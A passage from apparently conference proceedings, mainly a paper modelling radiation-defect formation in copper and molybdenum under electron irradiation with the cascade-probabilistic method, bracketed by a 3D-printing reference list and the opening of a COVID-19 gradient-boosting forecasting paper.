References 1. Sliusar, V.I.: Fabber-technologies. A new tool for three-dimensional modeling. Electron. Sci. Technol. Bus. 5, 54–60 (2003) 2. Murphy, V.S., Atala, A.: 3D-bioprinting of tissues and organs. Nat. Biotechnol. 32, 773–785 (2014). https://doi.org/10.1038/nbt.2958 3. 3D-printing for Everyone. SketchUp. http://www.sketchup.com 4. 3D Printing. 3D Printers. MakerBot. http://www.makerbot.com 5. ABS and PLA Plastics. What is the Difference Between ABS Plastic and PLA Plastic. http://picaso-3d.com/ru/abs-i-pla-plastiki 6. Markov, O.E., Kukhar, V.V., Zlygoriev, V.N., Shapoval, A.A., Khvashchynskyi, A.S., Zhytnikov, R.U.: Improvement of upsetting process of four-beam workpieces based on computerized and physical modeling. FME Trans. 48, 946–953 (2020). https://doi.org/10.5937/fme2004946M 7. Dragobetskii, V., Shapoval, A., Naumova, E., Shlyk, S., Mospan, D., Sikulskiy, V.: The technology of production of a copper - aluminum - copper composite to produce current lead buses of the high - voltage plants. In: Proceedings of the International Conference on Modern Electrical and Energy Systems (MEES 2017), pp. 400–403 (2017). https://doi.org/10.1109/MEES.2017.8248944 8. Lutsenko, I.: Definition of efficiency indicator and study of its main function as an optimization criterion. Eastern-Eur. J. Enterp. Technol. 6, 24–32 (2016). https://doi.org/10.15587/1729-4061.2016.85453 9. Schuldt, S.J.: A systematic review and analysis of the viability of 3D-printed construction in remote environments. Autom. Constr. 125, 103642 (2021). https://doi.org/10.1016/j.autcon.2021.103642 10. Rivera, R.G., Alvarado, R.G., Martínez-Rocamora, A., Cheein, F.A.: A comprehensive performance evaluation of different mobile manipulators used as displaceable 3D printers of building elements for the construction industry. Sustainability 12, 4378 (2020) 11. Gross, B.C., Erkal, J.L., Lockwood, S.Y., Chen, C., Spence, D.M.: Evaluation of 3D printing and its potential impact on biotechnology and the chemical sciences. Anal. Chem. 86(7), 3240–3253 (2014). https://doi.org/10.1021/ac403397r 12. Siddika, A., Al Mamun, M.A., Ferdous, W., Saha, A.K., Alyousef, R.: 3D-printed concrete: applications, performance, and challenges. J. Sustain. Cem. Mater. 9, 127–164 (2020) 13. Types of 3D Printers and Three-Dimensional Printing. http://www.techno-guide.ru/informatsionnye-tekhnologii/3d-tekhnologii/vidy-3d-printerov-i-trekhmernoj-pechati.html 14. Rouf, S., Raina, A., Haq, M.I.U., Naveed, N., Jeganmohan, S., Kichloo, A.F.: 3D printed parts and mechanical properties: influencing parameters, sustainability aspects, global market scenario, challenges and applications. Adv. Ind. Eng. Polymer Res. 5(3), 143–158 (2022). https://doi.org/10.1016/j.aiepr.2022.02.001 15. Canessa, E., Fonda, C., Zennaro, M.: Low-Cost 3D Printing for Science, Education & Sustainable Development, 1st edn. ICTP-The Abdus Salam International Centre for Theoretical Physics, Trieste, Italy (2013)
16. Quigley, J.T.: Chinese Scientists are 3D-Printing Ears and Livers With Living Tissue (2013). https://thediplomat.com/2013/08/chinese-scientists-are-3d-printing-ears-and-livers-with-living-tissue/ 17. Home News. Updates 3D Printer Bed Adhesion. Testing Aqua Net Hair Spray and Other Tips. http://www.protoparadigm.com/news-updates/3d-printer-bed-adhesion-testing-aqua-net-hair-spray-and-other-tips 18. KISSlicer [Keep It Simple Slicer]. http://www.kisslicer.com 19. RepRap: Blog: Vapor Treating ABS RP Parts. http://blog.reprap.org/2013/02/vapor-treating-abs-rp-parts.html 20. Cullen, A.T., Price, A.D.: Fabrication of 3D conjugated polymer structures via vat polymerization additive manufacturing. Smart Mater. Struct. 28, 104007 (2019) 21. 3D Printer Extruder. Review of 3D Printers. http://prn3d.ru/stati/pechat-na-3d-printere/extruder.html 22. Doely, P.K.: 3D Printing: A New Dimension in Construction. http://fwhtlaw.com/briefing-papers/3d-printing-new-dimension-construction 23. Özalp, F., Yilmaz, H.D.: Fresh and hardened properties of 3D high-strength printing concrete and its recent applications. Iran. J. Sci. Technol.-Trans. Civ. Eng. 44, 319–330 (2020) 24. Comparing mechanical properties of ABS and PLA filaments. https://www.liqcreate.com/supportarticles/properties-fdm-sls-resin/ 25. Fang, G., Zhong, S., Zhong, Z., Zhang, T., Chen, X., Wang, C.C.L.: Reinforced FDM: multi-axis filament alignment with controlled anisotropic strength. ACM Trans. Graph. 39, 6 (2020). https://doi.org/10.1145/3414685.3417834 26. Isa, M.A., Lazoglu, I.: Five-axis additive manufacturing of freeform models through buildup of transition layers. J. Manuf. Syst. 50, 69–80 (2019). https://doi.org/10.1016/j.jmsy.2018.12.002 27. Lim, S., Buswell, R.A., Valentine, P.J., Piker, D., Austin, S.A., Kestelier, X.D.: Modelling curved-layered printing paths for fabricating large-scale construction components. Addit. Manuf. 12, 216–230 (2016). https://doi.org/10.1016/j.addma.2016.06.004 28. https://hackaday.com/2016/07/27/3d-printering-non-planar-layer-fdm/ 29. Hong, F., Myant, C., Hodges, S., Boyle, D.: Open5x: Accessible 5-Axis 3D Printing and Conformal Slicing. arXiv:2202.11426v2 (2022). https://arxiv.org/pdf/2202.11426.pdf 30. Gardner, J.A., Kaill, N., Campbell, R.I., Bingham, G.A., Engstrøm, D.S., Balc, N.O.: Aligning material extrusion direction with mechanical stress via 5-axis tool paths. In: 29th Annual International Solid Freeform Fabrication Symposium. An Additive Manufacturing Conference (SFF), pp. 2005–2019 (2018) 31. Kaill, N., Campbell, R.I., Pradel, P., Bingham, G.: A comparative study between 3-axis and 5-axis additively manufactured samples and their ability to resist compressive loading. In: Proceedings of the 30th Annual International Solid Freeform Fabrication Symposium, pp. 1818–1829 (2019) 32. Kampker, A., Triebs, J., Kawollek, S., Ayvaz, P., Hohenstein, S.: Review on machine design of material extrusion based additive manufacturing (AM) systems. Status-quo and potential analysis for manufacturing (AM) systems. In: 52nd CIRP Conference on Manufacturing Systems. Procedia CIRP, vol. 81, pp. 815–819 (2019). https://doi.org/10.1016/j.procir.2019.03.205 33. Doyle, K., Doyle, A., Ó Brádaigh, C.M., Jaredson, D.: Feasibility of carbon fibre/peek composites for cryogenic fuel tank applications. https://www.researchgate.net/publication/289961438 34. Kuznetsov, Yu.M.: World Trends and Prospects for the Development of Machine Tool Construction in Ukraine. Problems of Physical, Mathematical and Technical Education and Science of Ukraine in the Context of European Integration, pp. 45–55. NPU named after M.P. Drahomanova, Kyiv (2007)
35. Kuznetsov, Yu.N.: Genetic and morphological principle of creating new generation machine tools. Bull. SevNTU. Mech. Energy Ecol. 110, 3–12 (2010) 36. GOST 23597-79, ISO 841-74, Machine Tools, Numerically Controlled. Designation of Axis and Motion Directions. General Statements (1979). https://meganorm.ru/Data2/1/4294830/4294830515.pdf 37. Salenko, A., Melnychuk, P., Lashko, E., Derevianko, I., Samusenko, O.: Ensuring the functional properties of responsible structural plastic elements by means of 3-D printing. Eastern-Eur. J. Enterp. Technol. 5(1–107), 18–28 (2020)
Computer Modeling of Processes of Radiation Defect Formation in Materials Irradiated with Electrons
Tat'yana Shmygaleva1(B) and Aziza Srazhdinova2
1 Al-Farabi Kazakh National University, Almaty, Kazakhstan
[email protected]
2 Kazakh-British Technical University, Almaty, Kazakhstan
Abstract. Computer modeling of the spectrum of primary beaten-out atoms and of the concentration of point radiation defects in materials irradiated with electrons has been performed using the cascade-probabilistic method. A mathematical model of the energy spectra of primary beaten-out atoms is obtained. Algorithms for calculating the primary beaten-out atoms spectrum and the concentration of radiation defects are developed. Cascade-probabilistic functions are calculated as functions of the number of interactions and the penetration depth, along with the primary beaten-out atoms spectrum and the defect concentrations in materials irradiated with electrons. The results of the defect concentration calculations are compared with calculations made earlier without considering energy losses. It is apparent that accounting for energy losses makes a significant contribution to the spectrum of primary beaten-out atoms and to the defect concentration. Keywords: Model · algorithm · calculation · electron · spectrum of primary beaten-out atoms · concentration of radiation defects · cascade probabilistic function
1 Introduction For solids, ion irradiation is an efficient method to alter properties such as metal strength, corrosion resistance, metal fatigue, wear, etc. Nowadays, radiation physics of solids makes a considerable contribution to the advancement of nanophysics and the related applied field, nanoelectronics [1–5]. Under the effect of a certain type of bombarding particles, it is possible to form in a material a predefined structure and chemical compounds that are totally stable over a wide range of temperatures [6–8]. Many papers have been devoted to the problems of interaction of particles with matter and the generation of radiation defects when a substance is irradiated with protons, alpha particles, electrons and ions in particular [9–14]. To analyze the results of various experiments, it is important to know which processes occur when a particle interacts with the target substance [15–17]. The interaction of particles with matter depends on their type, charge, mass, and energy. Each interaction leads to a loss of particle energy [18–21].
The aim of the work is to study the parameters of radiation defect formation in materials irradiated with electrons, taking into account energy losses. In this connection, the following tasks are set: 1. to create a mathematical model of the energy spectra of primary knocked-out atoms; 2. to develop algorithms for calculating CPFs, spectra of PBOA, and defect concentrations; 3. to develop a set of programs for calculating these characteristics and to make the calculations; 4. to compare the results obtained with the previous ones obtained without taking energy losses into account; 5. to compare the calculation results with experiment. The subject of the study is the cascade-probabilistic functions, the spectrum of primary knocked-out atoms, and the concentration of radiation defects during electron irradiation. The object of the study is a solid, in our case the metals copper and molybdenum. We consider the interaction of electrons with the substance during the generation of radiation defects in solids. It is supposed that an electron formed at depth h' interacts with the substance in the following way: 1. The charged particle loses energy in ionization and excitation (the main type of energy loss); these losses are continuous over the penetration depth. 2. The electron forms a primary beaten-out atom (PBOA); for every hundreds of interactions with the electrons of the medium (ionization losses), a few interactions result in the formation of a PBOA. 3. The PBOA forms defects in the form of Frenkel pairs (a vacancy and an interstitial atom) in the case of electron irradiation. 4. For electrons, the relativistic case is considered, since the kinetic energy of electrons is comparable to or greater than their rest energy; the interaction cross section is taken as the McKinley-Feshbach or Mott cross section [19]. In the case of the interaction of electrons with a solid, in particular when calculating the spectrum of PBOA, it is necessary to take into account the overall energy losses for ionization and excitation during PBOA generation (in contrast to the simplest cascade-probabilistic functions (CPFs), where the interaction path is constant) [19]. This work is carried out within the framework of the cascade-probabilistic method, the essence of which is to obtain and then apply cascade-probabilistic functions. A CPF has the meaning of the probability that a particle, in this case an electron, reaches the registration depth h after n collisions. The spectrum of primary knocked-out atoms and the concentration of radiation defects are also important characteristics of the method. The PBOA spectrum has the meaning of the probability that a certain number of secondary particles with energy E2 are formed at depth h from one electron with energy E0, and it is used later to calculate the concentration of radiation defects. The defect concentration is the probability that a certain number of defects is formed from one electron with energy E0. Since the CP method is analytical, it is possible to calculate all the parameters of radiation defect formation at any depth of the irradiated material and to trace the entire process of interaction of an electron with the substance and
the formation of radiation defects in dynamics. In this paper, analytical expressions are obtained, algorithms are developed, and calculations of the cascade-probabilistic functions, the energy spectra of PBOA over depth, and the concentration of radiation defects in metals irradiated with electrons are performed, and their characteristics are studied.
2 Materials and Methods The cascade probabilistic function, considering the energy loss for electrons, has the following form [19]:

\psi_n(h', h, E_0) = \frac{\left(h - h' - \frac{1}{ak}\ln\frac{E_0 - kh'}{E_0 - kh}\right)^n}{\prod_{i=1}^{n}\lambda_0 i} \cdot \exp\left(-\frac{h - h'}{\lambda_0} + \frac{1}{\lambda_0 ak}\ln\frac{E_0 - kh'}{E_0 - kh}\right), (1)

where n is the number of interactions; h', h are the depths of generation and registration of an electron; E_0 is the initial energy of the electron; \sigma_0, a, k are the approximation coefficients for the interaction cross section calculated using the McKinley-Feshbach formula; \lambda_0 = 1/\sigma_0 [19]:

\sigma(E_1) = \frac{4\pi a_0^2 \varepsilon_r^2 z^2 (1-\beta^2)}{\beta^4 m_1^2 c^4}\left[\frac{E_{2\max}}{E_d} - 1 - \beta^2\ln\frac{E_{2\max}}{E_d} + \pi\alpha\beta\left(2\left(\sqrt{\frac{E_{2\max}}{E_d}} - 1\right) - \ln\frac{E_{2\max}}{E_d}\right)\right] \cdot 10^{24}, (2)

where z is the atomic number of the medium; m_1 c^2 = 0.511 MeV is the rest energy of an electron; \beta = v/c, v is the velocity of the incident particle and c is the speed of light; \alpha = z/137; E_{2\max} = 2E_1(E_1 + 2m_1 c^2)/(m_2 c^2) is the maximum kinetic energy received by an atom; E_1 is the kinetic energy of the bombarding particle, in this case an electron; m_2 c^2 = A \cdot 931.7 MeV is the rest energy of an atom; A is the atomic mass; E_d is the displacement energy; a_0 is the Bohr radius; \varepsilon_r is the Rydberg energy. Ionization energy losses are calculated using the Bethe-Bloch formula [19]:

\frac{dE}{dx} = f(E) = \frac{2\pi r_0^2 m_1 c^2 z n_0 (\varepsilon+1)^2}{\varepsilon(\varepsilon+2)}\left[\ln\frac{m_1^2 c^4 \varepsilon^2(\varepsilon+2)}{2J^2} + 1 - \beta^2 + \frac{\varepsilon^2/8 - (2\varepsilon+1)\ln 2}{(1+\varepsilon)^2}\right], (3)

where r_0 is the classical electron radius; \varepsilon = E_1/(m_1 c^2); J is the ionization potential; n_0 is the number of atoms in 1 cm^3. The depths of observation are found by the formula

h = -\int_{E_0}^{E_0 - E}\frac{dE'}{f(E')}. (4)
The cross sections calculated as functions of the penetration depth are approximated by the following expression:

\sigma(h) = \sigma_0\left(1 - \frac{1}{c - bh}\right), (5)

where \sigma_0 is the approximation coefficient, c = aE_0, b = ak. The following formula is used to calculate the CPFs [19]:

\psi_n(h', h, E_0) = \exp\left[-\ln(n!) - n\ln\lambda_0 + \frac{1}{\lambda_0 ak}\ln\frac{E_0 - kh'}{E_0 - kh} - \frac{h - h'}{\lambda_0} + n\ln\left(h - h' - \frac{1}{ak}\ln\frac{E_0 - kh'}{E_0 - kh}\right)\right]. (6)

The spectrum of PBOA is calculated by the formula

W(E_0, E_2, h) = \sum_{n=0}^{n_1}\int_{h - k\lambda_2}^{h}\exp\left[-\ln n! - n\ln\lambda_0 + \frac{1}{\lambda_0 ak}\ln\frac{E_0}{E_0 - kh'} - \frac{h'}{\lambda_0} + n\ln\left(h' - \frac{1}{ak}\ln\frac{E_0}{E_0 - kh'}\right) - \frac{h - h'}{\lambda_2} - \ln\lambda_1(h') - \ln\lambda_2\right]\omega(E_1, E_2)\,dh', (7)

where \lambda_1, \lambda_2 are the mean free paths for electron-atom and atom-atom interactions, and \omega(E_1, E_2) is the PBOA spectrum in a unit event. Previously, a simpler formula was used to calculate the PBOA spectrum taking into account energy losses:

W(E_0, E_2, h) = \frac{\omega(E_1, E_2, h)}{\lambda_1(h)}, (8)

where

\lambda_1(h) = \frac{10^{24}}{\sigma_0\left(1 - \frac{1}{c - bh}\right) n_0} (cm).

The concentration of point radiation defects during electron irradiation is calculated by the formula [19]

C_k(E_0, h) = \int_{E_c}^{E_{2\max}}\nu(E_2)\,W(E_0, E_2, h)\,dE_2, (9)

where \nu(E_2) is the cascade function, given by

\nu(E_2) = \frac{0.4 E_2}{E_d}. (10)
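The logarithmic form (6) is convenient for direct numerical evaluation, since n! and λ0^n never appear explicitly. The following minimal sketch (not part of the paper) evaluates it in Python; the parameters are derived from Table 1 for Cu at E0 = 10 MeV (λ0 = 1/σ0, a = c/E0, k = b/a), while the chosen n and depths are arbitrary illustrations.

```python
# A minimal sketch of evaluating the CPF via the logarithmic form (6).
import math

def cpf(n, h1, h, E0, lam0, a, k):
    # h1 is the generation depth h', h the registration depth
    log_ratio = math.log((E0 - k*h1) / (E0 - k*h))
    base = h - h1 - log_ratio / (a*k)
    if base <= 0.0:          # outside the physically reachable region
        return 0.0
    return math.exp(-math.lgamma(n + 1) - n*math.log(lam0)
                    + log_ratio/(lam0*a*k) - (h - h1)/lam0
                    + n*math.log(base))

# Cu at E0 = 10 MeV (Table 1): sigma0 = 92.27, c = 128.8, b = 175.5
lam0, a = 1/92.27, 128.8/10.0
k = 175.5 / a
# For lam0 ~ 0.011 and h = 0.1 the result is close to the Poisson probability
# of n = 5 collisions over h/lam0 ~ 9.2 mean free paths, as expected when the
# energy-loss correction is small.
print(cpf(n=5, h1=0.0, h=0.1, E0=10.0, lam0=lam0, a=a, k=k))
```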
3 Experiments Experimental data on the depth distribution of point defects in the case of electron irradiation at low temperatures are few. For comparison with empirical data, Fig. 1 shows the results of calculations of the depth distributions of radiation-induced dislocation anchoring points in copper and molybdenum obtained by the internal friction method [19]. The number of dislocation anchoring points was determined from the experimental dependence of the internal friction on the deformation amplitude. Irradiation was carried out at a temperature t = 40–800 °C up to a fluence of 10^17 electrons/cm² (E0 = 1.8 MeV). As can be seen, the agreement is good.
Fig. 1. Distribution of dislocation anchoring points over depth in Mo (1), thickness h = 0.5 mm, and Cu (3): ▲ – h = 0.3 mm, ● – 0.5 mm, × – 0.8 mm; 2 and 4 – calculated dependence of the point defect concentration on depth using the CP method for electrons; E0 = 1.8 MeV
4 Results and Discussions Figure 2 illustrates the dependences of the interaction cross sections and their approximations on the penetration depth for electrons in copper at different values of E0. Crosses are the values calculated by the formula, and solid curves are the approximation values. Table 1 shows the values of the approximation parameters and the theoretical correlation relations for electrons in copper at different values of the initial energy. Tables 2, 3, 4, 5 and 6 show
the corresponding energies: the energy losses for ionization and excitation, the penetration depths, the calculated values of the interaction cross sections, and the approximation values. The approximation results show that: 1. with an increase in E0, the theoretical correlation ratio decreases (the remaining approximation parameters fluctuate, sometimes increasing, sometimes decreasing) (Table 1); 2. with increasing penetration depth, the curves have a pronounced maximum, the selection of the approximation curve becomes more complicated and, consequently, the theoretical correlation ratio decreases (Tables 2, 3 and 4); at small values of the initial energy, the curves decrease gradually, without reaching a maximum (Tables 5, 6); 3. for electrons at energies below the threshold, within the framework of our assumptions, the process of defect formation does not happen; consequently, this must also be taken into account in the approximation (Tables 2, 3, 4, 5 and 6); 4. at small values of the initial energy, it is mandatory to have the required number of points, enough to fit the approximation curve (Tables 5, 6). The calculation results show that the values found by formulas (2)–(4) and by the approximation (5) agree very well. The theoretical correlations for all elements vary in the range of 0.8–0.9999. The results of calculating the CPFs as a function of the number of interactions are presented in Fig. 3, and as a function of the penetration depth h in Fig. 4. Depending on the number of interactions at different h, the CPFs behave as follows: for small values of E0, the CPFs decrease for all h, and with an increase in E0 they also decrease for small h; starting from some values of h, the CPFs increase, reach a maximum, and then decrease. Depending on h, the CPFs for electrons at small E0 increase for all n ≥ 1 and decrease at n = 0. With an increase in E0, the CPFs for electrons at small h increase up to a certain observation depth, reach a maximum, and then start to decrease; with increasing n and h, the maximum shifts to the right. The results of calculating the PBOA spectrum are illustrated in Fig. 5. It can be seen that the spectrum as a function of E2 is a decreasing function for all depth values. Moreover, at low values of the electron energy the spectrum has the shape of a straight line; with an increase in the initial energy of the electron, the curves become smoother. The results of the calculations of the radiation defect concentration (Fig. 6) demonstrate that the curves have the shape of a decreasing dependence. The calculation results are compared with calculations performed earlier using the simple formula (8) for the PBOA spectrum.
The curves that take energy losses into account pass either below or above the curves that do not. This is explained by the fact that the radiation defect concentration values calculated with energy losses are smaller than those calculated without them for light elements, such as aluminum and titanium, whereas for heavy elements, such as copper and molybdenum, it is the other way round. The reason is that the cross-section values calculated by the McKinley-Feshbach formula for heavy elements increase with depth, reach a maximum, and then decrease, while for light elements the cross section is a decreasing function of depth, or the value of the function at the maximum point is insignificant compared to the value at the minimum point. In our case, the curves that take energy losses into account pass above the curves that do not, which confirms that energy losses must be taken into account both when calculating the cascade probabilistic functions and when calculating the PBOA spectrum and the concentration of radiation defects. Energy losses make the most significant contribution in the low-energy region. Figures 7 and 8 show fragments of the program code for calculating the spectra of PBOA and the concentration of radiation defects under electron irradiation.
Fig. 2. Dependence of the interaction cross-section for electrons in copper on penetration depth at different values of E0: 1 – 10; 2 – 8; 3 – 6; 4 – 4; 5 – 2 (MeV). Asterisks – calculated values of the cross-section versus depth; solid line – approximation
Table 1. Approximation values and theoretical correlation relation for electrons in Cu

E0, MeV | σ0 | c | b | η
1 | 93.17 | 8.31 | 106.1 | 0.9998
2 | 98.58 | 11.2 | 62.06 | 0.99998
4 | 98.88 | 28.4 | 87.99 | 0.998
6 | 94.52 | 49.06 | 105.3 | 0.997
8 | 93.37 | 76.64 | 126.9 | 0.991
10 | 92.27 | 128.8 | 175.5 | 0.98
20 | 89.07 | 718.8 | 525.9 | 0.8
Table 2. Energy, penetration depth, interaction cross-sections, approximation values of the interaction cross-section for electrons in Cu at E0 = 10 MeV

№ | dE/dx | E1 | h | σ(E1) | σ(E1) app.
1 | 14.5981 | 9.5 | 0.0341 | 89.9115 | 89.9115
2 | 14.5014 | 9.0 | 0.0685 | 90.0784 | 89.9105
3 | 14.3996 | 8.5 | 0.1031 | 90.2526 | 89.9085
4 | 14.2922 | 8.0 | 0.1380 | 90.4338 | 89.9075
5 | 14.1787 | 7.5 | 0.1731 | 90.6213 | 89.9065
6 | 14.0582 | 7.0 | 0.2085 | 90.8137 | 89.9035
7 | 13.9299 | 6.5 | 0.2442 | 91.0087 | 89.8993
8 | 13.7929 | 6.0 | 0.2803 | 91.2082 | 89.8941
9 | 13.646 | 5.5 | 0.3167 | 91.3879 | 89.8872
10 | 13.4878 | 5.0 | 0.3536 | 91.5554 | 89.8929
11 | 13.3168 | 4.5 | 0.3909 | 91.6875 | 89.8751
12 | 13.1313 | 4.0 | 0.4287 | 91.7559 | 89.8608
13 | 12.9293 | 3.5 | 0.4671 | 91.7127 | 89.8531
14 | 12.7095 | 3.0 | 0.5061 | 91.4739 | 89.8306
15 | 12.4723 | 2.5 | 0.5458 | 90.8869 | 89.8004
16 | 12.224 | 2.0 | 0.5863 | 89.6602 | 89.6667
17 | 11.9935 | 1.5 | 0.6276 | 87.2022 | 87.2025
18 | 11.9057 | 1.0 | 0.6695 | 82.2048 | 82.2040
19 | 12.7439 | 0.5 | 0.7106 | 69.7066 | 69.7066
Table 3. Energy, penetration depth, interaction cross-sections, approximation values of the interaction cross-section for electrons in Cu at E0 = 8 MeV

№ | dE/dx | E1 | h | σ(E1) | σ(E1) app.
1 | 14.2019 | 7.6 | 0.0281 | 90.5834 | 89.2391
2 | 14.1072 | 7.2 | 0.0563 | 90.7363 | 89.2381
3 | 14.0078 | 6.8 | 0.0848 | 90.8916 | 89.2371
4 | 13.9032 | 6.4 | 0.1134 | 91.0477 | 89.2360
5 | 13.7929 | 6.0 | 0.1423 | 91.2022 | 89.2346
6 | 13.6762 | 5.6 | 0.1714 | 91.3518 | 89.2331
7 | 13.5525 | 5.2 | 0.2008 | 91.4915 | 89.2313
8 | 13.4211 | 4.8 | 0.2305 | 91.6137 | 89.2292
9 | 13.2809 | 4.4 | 0.2605 | 91.7074 | 89.2267
10 | 13.1313 | 4.0 | 0.2907 | 91.7559 | 89.2237
11 | 12.9711 | 3.6 | 0.3214 | 91.7336 | 89.2198
12 | 12.7996 | 3.2 | 0.3524 | 91.6006 | 89.2149
13 | 12.6166 | 2.8 | 0.3839 | 91.2930 | 89.2083
14 | 12.4231 | 2.4 | 0.4158 | 90.7058 | 89.1991
15 | 12.224 | 2.0 | 0.4483 | 89.6602 | 89.1851
16 | 12.0349 | 1.6 | 0.4813 | 87.8388 | 89.1616
17 | 11.9049 | 1.2 | 0.5147 | 84.6496 | 89.1137
18 | 12.015 | 0.8 | 0.5483 | 78.8356 | 88.9659
19 | 14.2019 | 0.4 | 0.5803 | 62.6267 | 62.6256
Table 4. Energy, penetration depth, interaction cross-sections, approximation values of the interaction cross-section for electrons in Cu at E0 = 6 MeV

№ | dE/dx | E1 | h | σ(E1) | σ(E1) app.
1 | 13.6762 | 5.6 | 0.0291 | 91.3518 | 92.4689
2 | 13.5525 | 5.2 | 0.0585 | 91.4915 | 92.3207
3 | 13.4211 | 4.8 | 0.0882 | 91.6137 | 92.1475
4 | 13.2809 | 4.4 | 0.1181 | 91.7074 | 91.9433
5 | 13.1313 | 4.0 | 0.1484 | 91.7559 | 91.6972
6 | 12.9711 | 3.6 | 0.1791 | 91.7336 | 91.3948
7 | 12.7996 | 3.2 | 0.2101 | 91.6006 | 91.0158
8 | 12.6166 | 2.8 | 0.2416 | 91.2930 | 90.5235
9 | 12.4231 | 2.4 | 0.2735 | 90.7058 | 89.8608
10 | 12.224 | 2.0 | 0.3060 | 89.6602 | 88.9140
11 | 12.0349 | 1.6 | 0.3390 | 87.8388 | 87.4571
12 | 11.9049 | 1.2 | 0.3724 | 84.6496 | 84.9370
13 | 12.015 | 0.8 | 0.4059 | 78.8356 | 79.5985
14 | 13.6762 | 0.4 | 0.4380 | 62.6267 | 62.5241
Table 5. Energy, penetration depth, interaction cross-sections, approximation values of the interaction cross-section for electrons in Cu at E0 = 4 MeV

№ | dE/dx | E1 | h | σ(E1) | σ(E1) app.
1 | 13.0526 | 3.8 | 0.0153 | 91.7557 | 92.3390
2 | 12.9711 | 3.6 | 0.0307 | 91.7336 | 92.1521
3 | 12.8868 | 3.4 | 0.0461 | 91.6842 | 91.9044
4 | 12.7996 | 3.2 | 0.0617 | 91.6006 | 91.7090
5 | 12.7095 | 3.0 | 0.0774 | 91.4739 | 91.4419
6 | 12.6166 | 2.8 | 0.0932 | 91.2930 | 91.1361
7 | 12.521 | 2.6 | 0.1091 | 91.0432 | 90.7828
8 | 12.4231 | 2.4 | 0.1251 | 90.7058 | 90.3690
9 | 12.3236 | 2.2 | 0.1413 | 90.2558 | 89.8776
10 | 12.224 | 2.0 | 0.1576 | 89.6602 | 89.2848
11 | 12.1264 | 1.8 | 0.1740 | 88.8746 | 88.5573
12 | 12.0349 | 1.6 | 0.1906 | 87.8388 | 87.6370
13 | 11.9567 | 1.4 | 0.2072 | 86.4695 | 86.4522
14 | 11.9049 | 1.2 | 0.2240 | 84.6496 | 84.8475
15 | 11.9057 | 1.0 | 0.2408 | 82.2048 | 82.5848
16 | 12.015 | 0.8 | 0.2575 | 78.8356 | 79.1806
17 | 12.3696 | 0.6 | 0.2740 | 73.7620 | 73.5260
Table 6. Energy, penetration depth, interaction cross-sections, approximation values of the interaction cross-section for electrons in Cu at E0 = 2 MeV

№ | dE/dx | E1 | h | σ(E1) | σ(E1) app.
1 | 12.1748 | 1.9 | 0.0082 | 89.2945 | 89.3561
2 | 12.1264 | 1.8 | 0.0164 | 88.8746 | 88.8952
3 | 12.0796 | 1.7 | 0.0247 | 88.3925 | 88.3792
4 | 12.0349 | 1.6 | 0.0330 | 87.8388 | 87.8051
5 | 11.9935 | 1.5 | 0.0413 | 87.2022 | 87.1625
6 | 11.9567 | 1.4 | 0.0497 | 86.4695 | 86.4291
7 | 11.9263 | 1.3 | 0.0580 | 85.625 | 85.6057
8 | 11.9049 | 1.2 | 0.0664 | 84.6496 | 84.6502
9 | 11.8963 | 1.1 | 0.0748 | 83.5196 | 83.5428
10 | 11.9057 | 1.0 | 0.0832 | 82.2048 | 82.2442
11 | 11.9412 | 0.9 | 0.0916 | 80.6641 | 80.7000
12 | 12.015 | 0.8 | 0.1000 | 78.8356 | 78.8332
13 | 12.1467 | 0.7 | 0.1083 | 76.6108 | 76.5618
14 | 12.3696 | 0.6 | 0.1164 | 73.7620 | 73.7774
Fig. 3. Dependence of CPFs for electrons in copper on the number of interactions at E0 = 6 MeV; h = 0.1; 0.2; 0.3; 0.4 cm (1–4)
Fig. 4. Dependence of CPFs for electrons in copper on h at n = 2, 4, 6, 8, 10, 12, 14; E0 = 4 MeV (1–7)
Fig. 5. PBOA spectrum at various depths in copper under electron irradiation with energy E0 = 1 and 10 MeV: 1 – 1 MeV, 0.2 mm; 2 – 1 MeV, 0.4 mm; 3 – 10 MeV, 2 mm; 4 – 10 MeV, 4 mm
Fig. 6. Distribution of defects per incident electron over depth at different E0 in copper: 1, 3 – 1 MeV; 2, 4 – 2 MeV; curves 1, 2 – Cd calculated using the spectrum with energy losses taken into account; 3, 4 – Cd calculated using the spectrum from the simple formula (8)
Fig. 7. Program code for calculating the spectra of PBOA
Fig. 8. Program code for calculating the concentration of radiation defects
5 Conclusions

Thus, in this work, modeling of the processes of radiation defect formation in materials irradiated with electrons has been carried out. An approximation expression has been selected and the approximation parameters found for various values of the initial energy. The difficulties and peculiarities of selecting the approximation coefficients are revealed; the selection is carried out so that the theoretical correlation ratio is as close to 1 as possible. Cascade probabilistic functions are calculated as functions of the number of interactions and the depth of particle penetration, and the behavior of these functions is analyzed. The expressions for the CPFs are then used to calculate the PBOA spectra and the concentration of defects. Algorithms for calculating the spectra of primary dislodged atoms and the concentration of radiation defects are presented. The PBOA spectrum is calculated as a function of energy at different values of the initial energy and at different depths, and the concentration of radiation defects is computed. The results of the defect-concentration calculations are compared with calculations performed earlier using a simple formula for the PBOA spectra that does not take energy losses into account. It is shown that, when calculating the parameters of radiation defect formation, it is necessary to take into account energy losses for ionization and excitation. The results of calculating point defects are compared with experiment. There is good agreement: the
discrepancy between the calculated and experimental data is 3%. The models and algorithms obtained in the work can be used by specialists in the field of solid-state radiation physics, cosmophysics and applied mathematics.
Information Systems in Medicine
Forecasting of COVID-19 Epidemic Process in Ukraine and Neighboring Countries by Gradient Boosting Method Dmytro Chumachenko1(B) , Tetyana Chumachenko2 , Ievgen Meniailov1 , Olena Muradyan3 , and Grigoriy Zholtkevych3 1 National Aerospace University “Kharkiv Aviation Institute”, Kharkiv, Ukraine
[email protected] 2 Kharkiv National Medical University, Kharkiv, Ukraine 3 V.N. Karazin Kharkiv National University, Kharkiv, Ukraine
Abstract. The new coronavirus has changed the life of the planet and continues to spread around the world. Mathematical modeling allows the development of effective, scientifically substantiated preventive and anti-epidemic measures. Machine learning methods provide the highest accuracy when constructing the predicted incidence of infectious diseases. In this work, a gradient boosting model is built to calculate the predicted incidence of COVID-19. To investigate the epidemic process in Ukraine, we have built a simulation model for Ukraine and its neighbors: Belarus, Hungary, Moldova, Poland, Romania, Russia, and Slovakia. To verify the model, real data on the incidence of coronavirus were used. These countries were chosen because they have different dynamics of the epidemic process and different control measures, and because they influenced the dynamics of the COVID-19 epidemic process in Ukraine.

Keywords: Epidemic model · epidemic process simulation · COVID-19 · machine learning · gradient boosting
1 Introduction

